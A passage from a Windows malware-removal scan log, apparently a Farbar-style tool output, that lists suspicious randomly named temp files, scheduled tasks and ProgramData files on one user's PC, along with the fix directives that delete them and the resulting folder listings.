02:22 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\KaAzBzg.tmp 2022-03-22 01:46 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zIBKqww.tmp 2022-03-22 01:46 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\EAyEynk.tmp 2022-03-22 01:00 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\BvqpwdK.tmp 2022-03-22 01:00 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\yc.Kam..tmp 2022-03-21 23:38 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\cbmkybA.tmp 2022-03-21 23:38 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\Io..gvn.tmp 2022-03-21 22:16 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\CrKgBBd.tmp 2022-03-21 22:16 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\tgIysyi.tmp 2022-03-21 20:54 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\EDhbFIz.tmp 2022-03-21 20:54 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\nGtAkFz.tmp 2022-03-21 20:37 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\vCkilCq.tmp 2022-03-21 20:37 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\EaBiAea.tmp 2022-03-21 19:32 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\CisKbHh.tmp 2022-03-21 19:32 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.r.ubyg.tmp 2022-03-21 18:35 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\migEyFu.tmp 2022-03-21 18:35 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.tyCkte.tmp 2022-03-21 18:32 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\EygEhJE.tmp 2022-03-21 18:32 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\Ja.AJly.tmp 2022-03-21 18:10 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\hgJmzHc.tmp 2022-03-21 18:10 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\lfjDy.A.tmp 2022-03-21 18:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\bwyFtJD.tmp 2022-03-21 18:05 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\d.KvBEk.tmp 2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\hGmrugl.tmp 2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\CFCbraa.tmp 2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\swhi.Fm.tmp 2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\GuyFxhj.tmp 2022-03-21 16:52 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zkKIqmK.tmp 2022-03-21 16:52 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\oCGeaDq.tmp 2022-03-21 16:48 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\iewoixB.tmp 2022-03-21 16:48 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\IvocJvb.tmp 2022-03-21 16:47 - 2022-03-23 08:25 - 000003730 _____ C:\WINDOWS\system32\Tasks\microWord 2022-03-21 15:25 - 2022-03-21 15:25 - 000003768 _____ C:\WINDOWS\system32\Tasks\calendersw 2022-03-21 15:25 - 2020-10-14 07:54 - 000433152 _____ (Microsoft Corporation) C:\ProgramData\ESETNONU.com 2022-03-21 15:25 - 2019-12-07 05:10 - 000013312 _____ (Microsoft Corporation) C:\ProgramData\milon.com 2022-03-21 15:24 - 2019-12-07 05:10 - 000013312 _____ (Microsoft Corporation) C:\ProgramData\ddond.com 2022-03-22 10:34 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.AInoHs.tmp 2022-03-22 05:30 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.BahC.h.tmp 2022-03-23 00:14 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.DmrCyx.tmp 2022-03-23 05:42 - 2022-03-23 05:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.EipzDA.tmp 2022-03-22 09:12 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.Fixosu.tmp 2022-03-22 18:46 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.gq.eEv.tmp 2022-03-21 19:32 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.r.ubyg.tmp 2022-03-21 18:35 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.tyCkte.tmp 2022-03-22 11:11 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.wB.u.k.tmp 2022-03-22 11:35 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.yvbevo.tmp 2022-03-22 03:44 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.yvkw.y.tmp 2022-03-22 20:05 - 2022-03-22 19:54 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\abF.FyJ.tmp 2022-03-22 20:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\AfKprbo.tmp 2022-03-22 07:50 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\As.e.Iq.tmp 2022-03-23 08:26 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\B.mvKwd.tmp 2022-03-22 04:04 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\BcvEhIh.tmp 2022-03-23 02:58 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\bvcozKc.tmp 2022-03-22 01:00 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\BvqpwdK.tmp 2022-03-21 18:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\bwyFtJD.tmp 2022-03-22 13:12 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\c.pmfr..tmp 2022-03-21 23:38 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\cbmkybA.tmp 2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\CFCbraa.tmp 2022-03-21 19:32 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\CisKbHh.tmp 2022-03-22 11:35 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\CqicpoE.tmp 2022-03-21 22:16 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\CrKgBBd.tmp 2022-03-22 03:00 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\cxuionk.tmp 2022-03-21 18:05 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\d.KvBEk.tmp 2022-03-22 14:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\DgkIlaH.tmp 2022-03-21 20:37 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\EaBiAea.tmp 2022-03-22 01:46 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\EAyEynk.tmp 2022-03-21 20:54 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\EDhbFIz.tmp 2022-03-21 18:32 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\EygEhJE.tmp 2022-03-22 03:51 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FcfgK.l.tmp 2022-03-22 22:52 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\fhIqKrG.tmp 2022-03-22 06:28 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FHm.CCw.tmp 2022-03-23 07:04 - 2022-03-23 05:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\Fkhvfuv.tmp 2022-03-22 13:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FkyDzBg.tmp 2022-03-22 17:24 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\flwKCyx.tmp 2022-03-23 05:42 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FooEDIz.tmp 2022-03-22 05:50 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FqFql.I.tmp 2022-03-22 06:28 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\G.zIGwn.tmp 2022-03-23 01:36 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\gelfCgB.tmp 2022-03-22 16:02 - 2022-03-22 15:31 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\GK.xB.H.tmp 2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\GuyFxhj.tmp 2022-03-22 03:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\GyhgfDG.tmp 2022-03-22 21:30 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\h.dA..r.tmp 2022-03-22 03:51 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\H.FnrcA.tmp 2022-03-22 18:20 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hc.Ekso.tmp 2022-03-22 22:52 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hdpl.A..tmp 2022-03-21 18:10 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hgJmzHc.tmp 2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hGmrugl.tmp 2022-03-22 16:02 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hHKvy.s.tmp 2022-03-22 09:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hHpH.vg.tmp 2022-03-22 04:04 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hKKAJt..tmp 2022-03-23 04:55 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\ianksBp.tmp 2022-03-21 16:48 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\iewoixB.tmp 2022-03-23 07:04 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\IlxrjIs.tmp 2022-03-22 11:11 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\imec.rK.tmp 2022-03-21 23:38 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\Io..gvn.tmp 2022-03-21 16:48 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\IvocJvb.tmp 2022-03-21 18:32 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\Ja.AJly.tmp 2022-03-22 03:44 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\JBAeesf.tmp 2022-03-22 20:08 - 2022-03-22 19:54 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\jKsc.Db.tmp 2022-03-22 13:18 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\kaampdk.tmp 2022-03-22 02:22 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\KaAzBzg.tmp 2022-03-22 13:18 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\KAJdHsx.tmp 2022-03-22 13:44 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\kawiKkt.tmp 2022-03-22 18:46 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\Kjvon.z.tmp 2022-03-21 18:10 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\lfjDy.A.tmp 2022-03-23 04:55 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\ljesr.e.tmp 2022-03-21 18:35 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\migEyFu.tmp 2022-03-23 08:26 - 2022-03-23 07:55 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\myciaB..tmp 2022-03-21 20:54 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\nGtAkFz.tmp 2022-03-21 16:52 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\oCGeaDq.tmp 2022-03-23 02:58 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\pAsnGil.tmp 2022-03-22 17:24 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\pddmtsw.tmp 2022-03-22 21:30 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\pF.Fltn.tmp 2022-03-22 03:00 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\pzvEJ.c.tmp 2022-03-22 05:06 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\qcmJyrv.tmp 2022-03-22 03:05 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\rGHtFCn.tmp 2022-03-22 13:44 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\rGjizBd.tmp 2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\swhi.Fm.tmp 2022-03-21 22:16 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\tgIysyi.tmp 2022-03-22 07:50 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\u.vBKhg.tmp 2022-03-22 05:50 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\uebnfhx.tmp 2022-03-23 00:14 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\uhhsnBd.tmp 2022-03-23 01:36 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\vacfsmG.tmp 2022-03-21 20:37 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\vCkilCq.tmp 2022-03-22 05:30 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\vowws.H.tmp 2022-03-22 10:34 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\x.fkmhm.tmp 2022-03-22 14:12 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\xbfAl.r.tmp 2022-03-22 01:00 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\yc.Kam..tmp 2022-03-22 20:08 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\ymybaBG.tmp 2022-03-22 02:22 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zatwfvJ.tmp 2022-03-22 05:06 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zBllBya.tmp 2022-03-22 01:46 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zIBKqww.tmp 2022-03-21 16:52 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zkKIqmK.tmp 2022-03-22 18:20 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zmabqBm.tmp AlternateDataStreams: C:\ProgramData\Temp:AB1A1E3D [742] SearchScopes: HKU\S-1-5-21-1394640484-365018484-2708498470-1001 -> DefaultScope {B18C6A76-7C50-4965-9A1B-B109B920ADCD} URL = SearchScopes: HKU\S-1-5-21-1394640484-365018484-2708498470-1001 -> {B18C6A76-7C50-4965-9A1B-B109B920ADCD} URL = FirewallRules: [UDP Query User{B5A12A77-2103-48C0-B36D-984E39636A68}C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe] => (Allow) C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe => No File FirewallRules: [TCP Query User{C8669CBA-D698-4654-B81A-2B14A9AB72F3}C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe] => (Allow) C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe => No File FirewallRules: [UDP Query User{51C5DD6A-E83B-4BC3-ABFC-716A8DF92697}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Block) C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe => No File FirewallRules: [TCP Query User{5B3CB77D-7C8D-4426-AF81-98921AC1C5B4}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Block) C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe => No File FirewallRules: [TCP Query User{05AE48DE-AA5E-4919-80F8-76893F99556E}C:\users\karin hostetler\appdata\local\temp\g2_2324\g2viewer.exe] => (Allow) C:\users\karin hostetler\appdata\local\temp\g2_2324\g2viewer.exe => No File FirewallRules: [UDP Query User{F6FCDB82-142B-409C-BF5F-ADE31A08D795}C:\users\karin hostetler\appdata\local\temp\g2_2324\g2viewer.exe] => (Allow) C:\users\karin hostetler\appdata\local\temp\g2_2324\g2viewer.exe => No File FirewallRules: [TCP Query User{5111D219-0C0F-4233-A42C-819264AD54A8}C:\program files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapse.exe => No File FirewallRules: [UDP Query User{012F3B51-9801-4889-A822-FB8B00F4B624}C:\program files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapse.exe => No File FirewallRules: [TCP Query User{5111D219-0C0F-4233-A42C-819264AD54A8}C:\program files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapse.exe => No File FirewallRules: [UDP Query User{012F3B51-9801-4889-A822-FB8B00F4B624}C:\program files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapse.exe => No File FirewallRules: [TCP Query User{F907B127-94C2-47D0-9A7E-4B0B9EE01372}C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe] => (Allow) C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe => No File FirewallRules: [UDP Query User{FB10B806-8BB0-4FB9-A223-2B6AEF749C05}C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe] => (Allow) C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe => No File FirewallRules: [TCP Query User{90C1ECD6-3651-4A40-9E84-086E1F6B159E}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe => No File FirewallRules: [UDP Query User{CD2CF4D2-6665-4D3B-9AAA-DDBB344E277C}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe => No File FirewallRules: [TCP Query User{806E6120-074E-4858-A443-3CCE548E0FDD}C:\program files\mozilla firefox\firefox.exe] => (Allow) C:\program files\mozilla firefox\firefox.exe => No File FirewallRules: [UDP Query User{93BA9D74-3E49-4A0B-949F-4403A1FD2F07}C:\program files\mozilla firefox\firefox.exe] => (Allow) C:\program files\mozilla firefox\firefox.exe => No File C:\ProgramData\milon.com C:\ProgramData\ddond.com C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision C:\Users\Karin Hostetler\AppData\Local\mbam C:\Users\Karin Hostetler\AppData\Local\Temp C:\ProgramData\Temp C:\Users\Karin Hostetler\AppData\Roaming\*.tmp ***************** Restore point was successfully created. Processes closed successfully. ========================= Folder: C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision ======================== 2022-03-22 13:11 - 2022-03-22 13:11 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\22-03-2022_13.11.29 2022-03-22 13:17 - 2022-03-22 13:43 - 000004398 ____A [218AA943A7D6E92136E61D3EF0BCC6F8] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\22-03-2022_13.17.11 2022-03-22 13:43 - 2022-03-22 14:06 - 000006180 ____A [C46D3CDDEE2BA142A0272BF47E67F29C] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\22-03-2022_13.43.11 2022-03-22 14:11 - 2022-03-22 14:24 - 000002222 ____A [19F7FD08F9FC3BAFFBB1A13E10AE96A6] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\22-03-2022_14.11.21 2022-03-22 16:01 - 2022-03-22 16:01 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\22-03-2022_16.01.18 2022-03-22 17:23 - 2022-03-22 17:23 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\22-03-2022_17.23.08 2022-03-22 18:19 - 2022-03-22 18:19 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\22-03-2022_18.19.15 2022-03-22 18:45 - 2022-03-22 18:45 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\22-03-2022_18.45.10 2022-03-22 20:01 - 2022-03-22 20:01 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\22-03-2022_20.01.06 2022-03-22 20:04 - 2022-03-22 20:04 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\22-03-2022_20.04.06 2022-03-22 20:07 - 2022-03-22 20:07 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\22-03-2022_20.07.08 2022-03-22 21:29 - 2022-03-22 21:29 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\22-03-2022_21.29.09 2022-03-22 22:51 - 2022-03-22 22:51 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\22-03-2022_22.51.10 2022-03-23 00:13 - 2022-03-23 00:13 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\23-03-2022_00.13.12 2022-03-23 01:35 - 2022-03-23 01:35 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\23-03-2022_01.35.09 2022-03-23 02:57 - 2022-03-23 02:57 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\23-03-2022_02.57.08 2022-03-23 04:54 - 2022-03-23 04:54 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\23-03-2022_04.54.10 2022-03-23 05:41 - 2022-03-23 05:41 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\23-03-2022_05.41.09 2022-03-23 07:03 - 2022-03-23 08:24 - 000000164 ____A [C35DC12F9EF5B5E1F027998C6EC29EFB] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\23-03-2022_07.03.08 2022-03-23 08:25 - 2022-03-23 09:37 - 000004418 ____A [7B4AF1D261CD285A43EB0902FD6CDE26] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\23-03-2022_08.25.10 2022-03-23 10:12 - 2022-03-23 11:00 - 000001456 ____A [AE4164E7EEF0D94E9D96DEECA28A396A] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\23-03-2022_10.12.41 2022-03-23 11:09 - 2022-03-23 12:05 - 000000700 ____A [16102C5065BA7DB18A9985EE74860036] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\23-03-2022_11.09.12 2022-03-23 12:31 - 2022-03-23 12:44 - 000000162 ____A [D3C5815DF36AA2EEF9DEEDFA11982E67] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\23-03-2022_12.31.08 2022-03-23 13:53 - 2022-03-23 14:59 - 000001042 ____A [B603245DC56F3F85D825B569CB6E4587] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\23-03-2022_13.53.10 2022-03-23 15:25 - 2022-03-23 15:42 - 000000554 ____A [1D88878DCB0A4AE2D8DE59009C416913] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\23-03-2022_15.25.54 2022-03-24 09:01 - 2022-03-24 09:01 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision\24-03-2022_09.01.13 ====== End of Folder: ====== ========================= Folder: C:\Users\Karin Hostetler\AppData\Local\mbam ======================== 2022-03-22 10:40 - 2022-03-22 10:40 - 000000000 ____D [00000000000000000000000000000000] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache 2022-03-22 10:40 - 2022-03-22 11:56 - 000000000 ____D [00000000000000000000000000000000] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache 2022-03-22 10:40 - 2022-03-22 10:40 - 000018292 ____A [5E305B70A6DBE250A8E48EFCA5E74883] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\027c5539f079587b9a39771fc1e5cdec9a03075a.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000005792 ____A [C8F289A6D47EA764CCCEFDA4ACD54687] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\0287568f6b75a8de2d21278106c373f2fd10f5ab.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000008184 ____A [9549FC7E72E338D1E4C41DA4029D0E09] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\02b886434a600fe00958b0089de347eac851d90d.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000050452 ____A [40E38CDD0BFD3A4FD7A1FD97D15B04CE] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\06a78fa2f0e81a50340690dd96fa5989054e2cef.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000018796 ____A [71BFBD4F97D2C61478B162A8AA2AEF11] () C:\Users\Karin Hostetler\AppData\Local\mbam\cache\qmlcache\0736b794213935fc48ae986b284aca3a1ee8cb2e.qmlc 2022-03-22 10:40 - 2022-03-22 10:40 - 000007160 ____A [88123EC2DAC1F1432013527A5DD6D561] () C:\Users\Karin 